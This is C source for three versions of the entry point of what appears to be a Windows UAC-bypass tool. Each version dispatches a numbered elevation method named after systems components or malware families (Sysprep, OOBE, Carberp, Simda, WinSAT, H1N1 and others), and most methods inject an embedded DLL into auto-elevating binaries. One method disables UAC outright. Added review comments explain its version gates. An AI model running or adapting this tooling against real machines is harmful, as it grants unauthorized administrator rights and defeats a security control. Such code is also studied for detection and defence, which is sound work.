/*
* ucmMain
*
* Purpose:
*
* Program entry point.
*
*/
UINT ucmMain()
{
	DWORD                   bytesIO, dwType, paramLen;
	WCHAR                   *p;
	WCHAR                   szBuffer[MAX_PATH + 1];
	TOKEN_ELEVATION_TYPE    ElevType;


	// Initialize global state before anything else. The g_ldp fields read
	// below (osver, IsWow64) are presumably filled in here - verify in ucmInit.
	if (ucmInit() != ERROR_SUCCESS) {
		return ERROR_INTERNAL_ERROR;
	}

	//query windows version
	// Windows 7 is the minimum supported release; anything older is refused.
	if (!supIsWindowsVersionOrGreater(HIBYTE(_WIN32_WINNT_WIN7), LOBYTE(_WIN32_WINNT_WIN7), 0)) {
		ucmShowMessage(TEXT("This Windows is unsupported."));
		return ERROR_NOT_SUPPORTED;
	}

	// Precondition on the caller's token: only an administrator running with
	// the UAC-filtered (limited) token is accepted. A full token, or a standard
	// user account, is rejected up front.
	ElevType = TokenElevationTypeDefault;
	if (!supGetElevationType(&ElevType)) {
		return ERROR_INVALID_ACCESS;
	}

	if (ElevType != TokenElevationTypeLimited) {
		ucmShowMessage(TEXT("Admin account with limited token required."));
		return ERROR_NOT_SUPPORTED;
	}

	// First command-line parameter = method id. The return value of
	// GetCommandLineParam is not checked here (the other entry points do check
	// it); a missing parameter is detected through bytesIO == 0 instead.
	dwType = 0;
	bytesIO = 0;
	RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
	GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &bytesIO);
	if (bytesIO == 0) {
		return ERROR_INVALID_DATA;
	}
	
	// NOTE(review): single-argument strtoul - presumably the project's own
	// runtime replacement rather than the CRT function (which takes endptr and
	// base); confirm. A non-numeric id presumably parses as 0 and then matches
	// no case in either switch below.
	dwType = strtoul(szBuffer);

	// Per-method OS build gates. Each method is tied to the build range it was
	// written against; outside that range the user is asked (UACFIX) whether to
	// continue anyway, and IDNO aborts. There is no default label: an unknown id
	// passes through unnoticed, matches nothing in the dispatch switch below,
	// and the function still returns ERROR_SUCCESS.
	switch (dwType) {

	case METHOD_SYSPREP1://cryptbase
		if (g_ldp.osver.dwBuildNumber > 9200) {
			if (ucmShowQuestion(UACFIX) == IDNO)
				return ERROR_UNSUPPORTED_TYPE;
		}
		break;

	case METHOD_SYSPREP2://shcore
		if (g_ldp.osver.dwBuildNumber != 9600) {
			if (ucmShowQuestion(UACFIX) == IDNO)
				return ERROR_UNSUPPORTED_TYPE;
		}
		break;

	case METHOD_SYSPREP3://dbgcore
		if (g_ldp.osver.dwBuildNumber != 10240)	{
			if (ucmShowQuestion(UACFIX) == IDNO)
				return ERROR_UNSUPPORTED_TYPE;
		}
		break;

	case METHOD_OOBE://oobe service
		if (g_ldp.osver.dwBuildNumber >= 10548) {
			if (ucmShowQuestion(UACFIX) == IDNO)
				return ERROR_UNSUPPORTED_TYPE;
		}
		break;

	case METHOD_REDIRECTEXE:
		if (g_ldp.osver.dwBuildNumber > 9600) {
			if (ucmShowQuestion(UACFIX) == IDNO)
				return ERROR_UNSUPPORTED_TYPE;
		}

		// 32-bit-only method: a 64-bit build refuses it outright (the dispatch
		// switch below compiles this case only under #ifndef _WIN64).
#ifdef _WIN64
		ucmShowMessage(WOW64WIN32ONLY);
		return ERROR_UNSUPPORTED_TYPE;
#endif
		break;

	case METHOD_SIMDA:
		if (g_ldp.osver.dwBuildNumber >= 10136) {
			if (ucmShowQuestion(UACFIX) == IDNO)
				return ERROR_UNSUPPORTED_TYPE;
		}
		break;

	case METHOD_CARBERP:
		if (g_ldp.osver.dwBuildNumber >= 10147) {
			if (ucmShowQuestion(UACFIX) == IDNO)
				return ERROR_UNSUPPORTED_TYPE;
		}
		break;

	case METHOD_CARBERP_EX:
		if (g_ldp.osver.dwBuildNumber >= 10147) {
			if (ucmShowQuestion(UACFIX) == IDNO)
				return ERROR_UNSUPPORTED_TYPE;
		}
		break;

	case METHOD_TILON:
		if (g_ldp.osver.dwBuildNumber > 9200) {
			if (ucmShowQuestion(UACFIX) == IDNO)
				return ERROR_UNSUPPORTED_TYPE;
		}
		break;

	case METHOD_AVRF:
		if (g_ldp.osver.dwBuildNumber >= 10136) {
			if (ucmShowQuestion(UACFIX) == IDNO)
				return ERROR_UNSUPPORTED_TYPE;
		}
		break;

	case METHOD_WINSAT:
		if (g_ldp.osver.dwBuildNumber >= 10548) {
			if (ucmShowQuestion(UACFIX) == IDNO)
				return ERROR_UNSUPPORTED_TYPE;
		}
		break;

	case METHOD_SHIMPATCH:
		if (g_ldp.osver.dwBuildNumber > 9600) {
			if (ucmShowQuestion(UACFIX) == IDNO)
				return ERROR_UNSUPPORTED_TYPE;
		}

		// 32-bit-only method, same handling as METHOD_REDIRECTEXE above.
#ifdef _WIN64
		ucmShowMessage(WOW64WIN32ONLY);
		return ERROR_UNSUPPORTED_TYPE;
#endif		
		break;

	case METHOD_MMC:
		break;

	case METHOD_H1N1:
		if (g_ldp.osver.dwBuildNumber >= 10548) {
			if (ucmShowQuestion(UACFIX) == IDNO)
				return ERROR_UNSUPPORTED_TYPE;
		}
		break;

	case METHOD_GENERIC:
		break;

	}

	//prepare command for payload
	// Optional second command-line parameter. paramLen is a WCHAR count (it is
	// scaled by sizeof(WCHAR) below). It is handed over through supSetParameter
	// for every method except METHOD_REDIRECTEXE, which receives szBuffer
	// directly in the ucmAppcompatElevation call further down. &szBuffer and
	// szBuffer denote the same address; the spelling difference from the first
	// RtlSecureZeroMemory call is cosmetic.
	paramLen = 0;
	RtlSecureZeroMemory(&szBuffer, sizeof(szBuffer));
	GetCommandLineParam(GetCommandLine(), 2, szBuffer, MAX_PATH, &paramLen);
	if (paramLen > 0) {
		if (dwType != METHOD_REDIRECTEXE) {
			supSetParameter((LPWSTR)&szBuffer, paramLen * sizeof(WCHAR));
		}
	}

	// Dispatch. Each method reports success only via OutputDebugString; the
	// function returns ERROR_SUCCESS either way, so the exit status of the
	// process does not reflect whether the selected method actually worked.
	switch (dwType) {

	case METHOD_SYSPREP1:
	case METHOD_SYSPREP2:
	case METHOD_SYSPREP3:
	case METHOD_OOBE:
	case METHOD_TILON:

		//
		// Since we are using injection and not using heavens gate/syswow64, we should ban usage under wow64.
		//
		// Release builds refuse WOW64 here; debug builds skip the check.
#ifndef _DEBUG
		if (g_ldp.IsWow64) {
			ucmShowMessage(WOW64STRING);
			return ERROR_UNSUPPORTED_TYPE;
		}
#endif
		if (ucmStandardAutoElevation(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
			OutputDebugString(TEXT("[UCM] Standard AutoElevation method called\n\r"));
		}
		break;

//
//  Allow only in 32 version.
//
#ifndef _WIN64
	case METHOD_REDIRECTEXE:
	case METHOD_SHIMPATCH:
		// The second parameter is passed here rather than via supSetParameter
		// (see the paramLen handling above); NULL when it was not given.
		if (ucmAppcompatElevation(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL), (paramLen != 0) ? szBuffer : NULL )) {
			OutputDebugString(TEXT("[UCM] AppCompat method called\n\r"));
		}
		break;
#endif
	case METHOD_SIMDA:

		//
		// Since we are using injection and not using heavens gate, we should ban usage under wow64.
		//
#ifndef _DEBUG
		if (g_ldp.IsWow64) {
			ucmShowMessage(WOW64STRING);
			return ERROR_UNSUPPORTED_TYPE;
		}
#endif
		// Destructive method: the user must confirm explicitly before it runs.
		if (MessageBox(GetDesktopWindow(),
			TEXT("This method will TURN UAC OFF, are you sure? You will need to reenable it after manually."),
			PROGRAMTITLE, MB_ICONQUESTION | MB_YESNO) == IDYES) 
		{
			if (ucmSimdaTurnOffUac()) {
				OutputDebugString(TEXT("[UCM] Simda method called\n\r"));
			}
		}
		break;

	case METHOD_CARBERP:
	case METHOD_CARBERP_EX:

		// METHOD_CARBERP: WOW64 is refused only on builds newer than 7601.
		if (dwType == METHOD_CARBERP) {

			//there is no migmiz in syswow64 in 8+
			if ((g_ldp.IsWow64) && (g_ldp.osver.dwBuildNumber > 7601)) {
				ucmShowMessage(WOW64STRING);
				return ERROR_UNSUPPORTED_TYPE;
			}
		}

		// METHOD_CARBERP_EX: WOW64 is refused unconditionally in release builds.
		if (dwType == METHOD_CARBERP_EX) {
#ifndef _DEBUG
			if (g_ldp.IsWow64) {
				ucmShowMessage(WOW64STRING);
				return ERROR_UNSUPPORTED_TYPE;
			}
#endif
		}

		if (ucmWusaMethod(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
			OutputDebugString(TEXT("[UCM] Carberp method called\n\r"));
		}
		break;

	case METHOD_AVRF:
#ifndef _DEBUG
		if (g_ldp.IsWow64) {
			ucmShowMessage(WOW64STRING);
			return ERROR_UNSUPPORTED_TYPE;
		}
#endif
		// Only method that uses AVRFDLL instead of INJECTDLL.
		if (ucmAvrfMethod((CONST PVOID)AVRFDLL, sizeof(AVRFDLL))) {
			OutputDebugString(TEXT("[UCM] AVrf method called\n\r"));
		}	
		break;

	case METHOD_WINSAT:
		//
		// Decoding WOW64 environment, turning wow64fs redirection is meeh. Just drop it as it just a test tool.
		//
		// Unlike the other WOW64 checks this one is active in debug builds too.
		if (g_ldp.IsWow64) {
			ucmShowMessage(LAZYWOW64UNSUPPORTED);
			return ERROR_UNSUPPORTED_TYPE;
		}

		// Target DLL name depends on the OS build.
		if (g_ldp.osver.dwBuildNumber < 9200) {
			p = L"powrprof.dll";
		}
		else {
			p = L"devobj.dll";
		}

		// The trailing BOOL presumably selects a build-dependent variant inside
		// ucmWinSATMethod - confirm against its definition.
		if (ucmWinSATMethod(p, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL), (g_ldp.osver.dwBuildNumber <= 10136))) {
			OutputDebugString(TEXT("[UCM] WinSAT method called\n\r"));
		}
		break;

	case METHOD_MMC:
		if (g_ldp.IsWow64) {
			ucmShowMessage(WOW64STRING);
			return ERROR_UNSUPPORTED_TYPE;
		}
		p = L"elsext.dll";
		if (ucmMMCMethod(p, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
			OutputDebugString(TEXT("[UCM] MMC method called\n\r"));
		}
		break;

	case METHOD_H1N1:
		if (g_ldp.IsWow64) {
			ucmShowMessage(WOW64STRING);
			return ERROR_UNSUPPORTED_TYPE;
		}

		if (ucmH1N1Method((CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
			OutputDebugString(TEXT("[UCM] H1N1 method called\n\r"));
		}
		break;

	case METHOD_GENERIC:
		if (g_ldp.IsWow64) {
			ucmShowMessage(WOW64STRING);
			return ERROR_UNSUPPORTED_TYPE;
		}

		p = L"ntwdblib.dll";

		if (ucmGenericAutoelevation(
			METHOD_SQLSRV_TARGETAPP,
			p, 
			(CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) 
		{
			OutputDebugString(TEXT("[UCM] Generic method called\n\r"));
		}
		break;

	}
	
	// Reached for every dispatched method and for unknown ids alike; see the
	// note above the dispatch switch.
	return ERROR_SUCCESS;
}
/*
* main
*
* Purpose:
*
* Program entry point.
*
*/
VOID main()
{
	BOOL					IsWow64 = FALSE;
	DWORD					bytesIO, dwType;
	WCHAR					szBuffer[MAX_PATH + 1];
	TOKEN_ELEVATION_TYPE	ElevType;
	RTL_OSVERSIONINFOW		osver;


	// Non-standard void main: the function never returns normally, every path
	// ends in ExitProcess(0) at the Done label. Because the exit code is always
	// 0, callers cannot distinguish a refused run from a completed one.

	//verify system version
	// Build 7000 (Windows 7 era) is the minimum; older builds are refused.
	RtlSecureZeroMemory(&osver, sizeof(osver));
	osver.dwOSVersionInfoSize = sizeof(osver);
	RtlGetVersion(&osver);

	if (osver.dwBuildNumber < 7000) {

		MessageBox(GetDesktopWindow(),
			TEXT("Unsupported version"), PROGRAMTITLE, MB_ICONINFORMATION);

		goto Done;
	}

	// Precondition on the caller's token: only an administrator running with
	// the UAC-filtered (limited) token is accepted. A query failure exits
	// silently, without a message.
	ElevType = TokenElevationTypeDefault;
	if (!supGetElevationType(&ElevType)) {
		goto Done;
	}
	if (ElevType != TokenElevationTypeLimited) {
		MessageBox(GetDesktopWindow(), TEXT("Admin account with limited token required."), 
			PROGRAMTITLE, MB_ICONINFORMATION);
		goto Done;
	}


	// NOTE(review): "is this a 32-bit process" is used as "is this WOW64"; on a
	// 32-bit OS the two differ. Presumably a 64-bit OS is assumed - confirm.
	IsWow64 = supIsProcess32bit(GetCurrentProcess());

	// First command-line parameter selects the method by string comparison.
	// Unrecognized input leaves dwType at 0, which matches no case below, so
	// the process simply exits. "4" is only recognized in 32-bit builds.
	dwType = 0;
	bytesIO = 0;
	RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
	if (GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &bytesIO)) {
		if (lstrcmpi(szBuffer, TEXT("1")) == 0) {
			OutputDebugString(TEXT("[UCM] Method Sysprep selected\n\r"));
			dwType = METHOD_SYSPREP;
		}
		if (lstrcmpi(szBuffer, TEXT("2")) == 0) {
			OutputDebugString(TEXT("[UCM] Method Sysprep_ex selected\n\r"));
			dwType = METHOD_SYSPREP_EX;
		}
		if (lstrcmpi(szBuffer, TEXT("3")) == 0) {
			OutputDebugString(TEXT("[UCM] Method Oobe selected\n\r"));
			dwType = METHOD_OOBE;
		}
#ifndef _WIN64
		if (lstrcmpi(szBuffer, TEXT("4")) == 0) {
			OutputDebugString(TEXT("[UCM] Method AppCompat selected\n\r"));
			dwType = METHOD_APPCOMPAT;
		}
#endif
		if (lstrcmpi(szBuffer, TEXT("5")) == 0) {
			OutputDebugString(TEXT("[UCM] Method Simda selected\n\r"));
			dwType = METHOD_SIMDA;
		}
		if (lstrcmpi(szBuffer, TEXT("6")) == 0) {
			OutputDebugString(TEXT("[UCM] Method Carberp selected\n\r"));
			dwType = METHOD_CARBERP;
		}
		if (lstrcmpi(szBuffer, TEXT("7")) == 0) {
			OutputDebugString(TEXT("[UCM] Method Carberp_ex selected\n\r"));
			dwType = METHOD_CARBERP_EX;
		}
	}

	// Build gate for the one method with a lower bound; the other gates live
	// inside the dispatch switch.
	if ((dwType == METHOD_SYSPREP_EX) && (osver.dwBuildNumber < 9600)) {
		MessageBox(GetDesktopWindow(), TEXT("This method is only for Windows 8.1 use"), 
			PROGRAMTITLE, MB_ICONINFORMATION);
		goto Done;
	}

	// Dispatch. Success is reported only through OutputDebugString; the
	// process exits with 0 regardless.
	switch (dwType) {

	case METHOD_SYSPREP:
	case METHOD_SYSPREP_EX:
	case METHOD_OOBE:

		//
		// Since we are using injection and not using heavens gate, we should ban usage under wow64.
		//
		// Release builds refuse WOW64 here; debug builds skip the check.
#ifndef _DEBUG
		if (IsWow64) {
			MessageBoxW(GetDesktopWindow(),
				WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
			goto Done;
		}
#endif
		if (ucmStandardAutoElevation(dwType, INJECTDLL, sizeof(INJECTDLL))) {
			OutputDebugString(TEXT("[UCM] Standard AutoElevation method called\n\r"));
		}
		break;

//
//  There is no RedirectEXE for x64.
//
#ifndef _WIN64
	case METHOD_APPCOMPAT:
		if (ucmAppcompatElevation()) {
			OutputDebugString(TEXT("[UCM] AppCompat method called\n\r"));
		}
		break;
#endif
	case METHOD_SIMDA:

		//
		// Since we are using injection and not using heavens gate, we should ban usage under wow64.
		//
#ifndef _DEBUG
		if (IsWow64) {
			MessageBoxW(GetDesktopWindow(),
				WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
			goto Done;
		}
#endif
		// Destructive method: the user must confirm explicitly before it runs.
		if (MessageBox(GetDesktopWindow(),
			TEXT("This method will TURN UAC OFF, are you sure? You will need to reenable it after manually."),
			PROGRAMTITLE, MB_ICONQUESTION | MB_YESNO) == IDYES) 
		{
			if (ucmSimdaTurnOffUac()) {
				OutputDebugString(TEXT("[UCM] Simda method called\n\r"));
			}
		}
		break;

	case METHOD_CARBERP:
	case METHOD_CARBERP_EX:

		// Extra gates apply to METHOD_CARBERP only: an upper build bound, and a
		// WOW64 refusal on builds newer than 7601. METHOD_CARBERP_EX has no
		// WOW64 check at all in this version.
		if (dwType == METHOD_CARBERP) {

			if (osver.dwBuildNumber > 9600) {
				MessageBoxW(GetDesktopWindow(),
					TEXT("This method is only for Windows 7/8/8.1"), PROGRAMTITLE, MB_ICONINFORMATION);
				goto Done;
			}

			//there is no migmiz in syswow64 in 8+
			if ((IsWow64) && (osver.dwBuildNumber > 7601)) {
				MessageBoxW(GetDesktopWindow(),
					WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
				goto Done;
			}
		}

		if (ucmWusaMethod(dwType, INJECTDLL, sizeof(INJECTDLL))) {
			OutputDebugString(TEXT("[UCM] Carberp method called\n\r"));
		}
		break;
	}

Done:
	// Single exit point; exit code is always 0 (see the note at the top).
	ExitProcess(0);
}
/*
* main
*
* Purpose:
*
* Program entry point.
*
*/
VOID main()
{
	BOOL					IsWow64 = FALSE;
	DWORD					bytesIO, dwType;
	WCHAR					*p;
	WCHAR					szBuffer[MAX_PATH + 1];
	TOKEN_ELEVATION_TYPE	ElevType;
	RTL_OSVERSIONINFOW		osver;

	// Non-standard void main: the function never returns normally, every path
	// ends in ExitProcess(0) at the Done label, so the exit code carries no
	// status - a refused run and a completed one look the same to a caller.

	//verify system version
	// Build 7000 (Windows 7 era) is the minimum; older builds are refused.
	RtlSecureZeroMemory(&osver, sizeof(osver));
	osver.dwOSVersionInfoSize = sizeof(osver);
	RtlGetVersion(&osver);

	if (osver.dwBuildNumber < 7000) {

		MessageBox(GetDesktopWindow(),
			TEXT("Unsupported version"), PROGRAMTITLE, MB_ICONINFORMATION);

		goto Done;
	}

	// Precondition on the caller's token: only an administrator running with
	// the UAC-filtered (limited) token is accepted. A query failure exits
	// silently, without a message.
	ElevType = TokenElevationTypeDefault;
	if (!supGetElevationType(&ElevType)) {
		goto Done;
	}
	if (ElevType != TokenElevationTypeLimited) {
		MessageBox(GetDesktopWindow(), TEXT("Admin account with limited token required."), 
			PROGRAMTITLE, MB_ICONINFORMATION);
		goto Done;
	}

	// NOTE(review): "is this a 32-bit process" is used as "is this WOW64"; on a
	// 32-bit OS the two differ (the METHOD_WINSAT message below hints at this).
	IsWow64 = supIsProcess32bit(GetCurrentProcess());

	// First command-line parameter = method id. If it is missing, dwType stays
	// 0, matches no case in the dispatch switch, and the process just exits.
	dwType = 0;
	bytesIO = 0;
	RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
	if (GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &bytesIO)) {

		// NOTE(review): single-argument strtoul - presumably the project's own
		// runtime replacement rather than the CRT function (which takes endptr
		// and base); confirm. A non-numeric id presumably parses as 0.
		dwType = strtoul(szBuffer);

		// Per-method OS build / bitness gates. Unlike the later version of this
		// entry point there is no "continue anyway" prompt: a failed gate exits.
		// No default label, so an unknown id is silently accepted here and then
		// ignored by the dispatch switch below.
		switch (dwType) {

		case METHOD_SYSPREP:
			OutputDebugString(TEXT("[UCM] Sysprep\n\r"));
			if (osver.dwBuildNumber > 9200) {
				MessageBox(GetDesktopWindow(), WINPREBLUE,
					PROGRAMTITLE, MB_ICONINFORMATION);
				goto Done;
			}
			break;

		case METHOD_SYSPREP_EX:
			OutputDebugString(TEXT("[UCM] Sysprep_ex\n\r"));
			if (osver.dwBuildNumber < 9600) {
				MessageBox(GetDesktopWindow(), WINBLUEONLY,
					PROGRAMTITLE, MB_ICONINFORMATION);
				goto Done;
			}
			break;

		case METHOD_OOBE:
			OutputDebugString(TEXT("[UCM] Oobe\n\r"));
			break;

		case METHOD_REDIRECTEXE:
			OutputDebugString(TEXT("[UCM] AppCompat RedirectEXE\n\r"));

			// 32-bit-only method: a 64-bit build refuses it outright (the
			// dispatch switch compiles this case only under #ifndef _WIN64).
#ifdef _WIN64
			MessageBox(GetDesktopWindow(), WOW64WIN32ONLY,
				PROGRAMTITLE, MB_ICONINFORMATION);
			goto Done;
#endif
			break;

		case METHOD_SIMDA:
			OutputDebugString(TEXT("[UCM] Simda\n\r"));
			break;

		case METHOD_CARBERP:
			OutputDebugString(TEXT("[UCM] Carberp\n\r"));
			break;

		case METHOD_CARBERP_EX:
			OutputDebugString(TEXT("[UCM] Carberp_ex\n\r"));
			break;

		case METHOD_TILON:
			OutputDebugString(TEXT("[UCM] Tilon\n\r"));
			if (osver.dwBuildNumber > 9200) {
				MessageBox(GetDesktopWindow(), WINPREBLUE,
					PROGRAMTITLE, MB_ICONINFORMATION);
				goto Done;
			}
			break;

		case METHOD_AVRF:
			OutputDebugString(TEXT("[UCM] AVrf\n\r"));
			break;

		case METHOD_WINSAT:
			OutputDebugString(TEXT("[UCM] WinSAT\n\r"));
			break;

		case METHOD_SHIMPATCH:
			OutputDebugString(TEXT("[UCM] AppCompat Shim Patch\n\r"));

			// 32-bit-only method, same handling as METHOD_REDIRECTEXE above.
#ifdef _WIN64
			MessageBox(GetDesktopWindow(), WOW64WIN32ONLY,
				PROGRAMTITLE, MB_ICONINFORMATION);
			goto Done;
#endif		
			break;

		}
	}


	// Dispatch. Success is reported only through OutputDebugString; the
	// process exits with 0 regardless.
	switch (dwType) {

	case METHOD_SYSPREP:
	case METHOD_SYSPREP_EX:
	case METHOD_OOBE:
	case METHOD_TILON:

		//
		// Since we are using injection and not using heavens gate, we should ban usage under wow64.
		//
		// Release builds refuse WOW64 here; debug builds skip the check.
#ifndef _DEBUG
		if (IsWow64) {
			MessageBox(GetDesktopWindow(),
				WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
			goto Done;
		}
#endif
		if (ucmStandardAutoElevation(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
			OutputDebugString(TEXT("[UCM] Standard AutoElevation method called\n\r"));
		}
		break;

//
//  Allow only in 32 version.
//
#ifndef _WIN64
	case METHOD_REDIRECTEXE:
	case METHOD_SHIMPATCH:
		if (ucmAppcompatElevation(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
			OutputDebugString(TEXT("[UCM] AppCompat method called\n\r"));
		}
		break;
#endif
	case METHOD_SIMDA:

		//
		// Since we are using injection and not using heavens gate, we should ban usage under wow64.
		//
#ifndef _DEBUG
		if (IsWow64) {
			MessageBox(GetDesktopWindow(),
				WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
			goto Done;
		}
#endif
		// Destructive method: the user must confirm explicitly before it runs.
		if (MessageBox(GetDesktopWindow(),
			TEXT("This method will TURN UAC OFF, are you sure? You will need to reenable it after manually."),
			PROGRAMTITLE, MB_ICONQUESTION | MB_YESNO) == IDYES) 
		{
			if (ucmSimdaTurnOffUac()) {
				OutputDebugString(TEXT("[UCM] Simda method called\n\r"));
			}
		}
		break;

	case METHOD_CARBERP:
	case METHOD_CARBERP_EX:

		// METHOD_CARBERP: upper build bound, and WOW64 refused on builds newer
		// than 7601.
		if (dwType == METHOD_CARBERP) {

			if (osver.dwBuildNumber > 9600) {
				MessageBox(GetDesktopWindow(),
					TEXT("This method is only for Windows 7/8/8.1"), PROGRAMTITLE, MB_ICONINFORMATION);
				goto Done;
			}

			//there is no migmiz in syswow64 in 8+
			if ((IsWow64) && (osver.dwBuildNumber > 7601)) {
				MessageBox(GetDesktopWindow(),
					WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
				goto Done;
			}
		}

		// METHOD_CARBERP_EX: WOW64 refused unconditionally in release builds.
		if (dwType == METHOD_CARBERP_EX) {
#ifndef _DEBUG
			if (IsWow64) {
				MessageBox(GetDesktopWindow(),
					WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
				goto Done;
			}
#endif
		}


		if (ucmWusaMethod(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
			OutputDebugString(TEXT("[UCM] Carberp method called\n\r"));
		}
		break;

	case METHOD_AVRF:
#ifndef _DEBUG
		if (IsWow64) {
			MessageBox(GetDesktopWindow(),
				WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
			goto Done;
		}
#endif
		// Only method that uses AVRFDLL instead of INJECTDLL.
		if (ucmAvrfMethod((CONST PVOID)AVRFDLL, sizeof(AVRFDLL))) {
			OutputDebugString(TEXT("[UCM] AVrf method called\n\r"));
		}	
		break;

	case METHOD_WINSAT:
		//
		// Decoding WOW64 environment, turning wow64fs redirection is meeh. Just drop it as it just a test tool.
		//
		// Unlike the other WOW64 checks this one is active in debug builds too.
		if (IsWow64) {
			MessageBox(GetDesktopWindow(),
				TEXT("Use 32 bit version of this tool on 32 bit OS version"), PROGRAMTITLE, MB_ICONINFORMATION);
			goto Done;
		}

		// Target DLL name depends on the OS build.
		if (osver.dwBuildNumber < 9200) {
			p = L"powrprof.dll";
		}
		else {
			p = L"devobj.dll";
		}

		if (ucmWinSATMethod(p, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
			OutputDebugString(TEXT("[UCM] WinSAT method called\n\r"));
		}
		break;
	}

Done:
	// Single exit point; exit code is always 0 (see the note at the top).
	ExitProcess(0);
}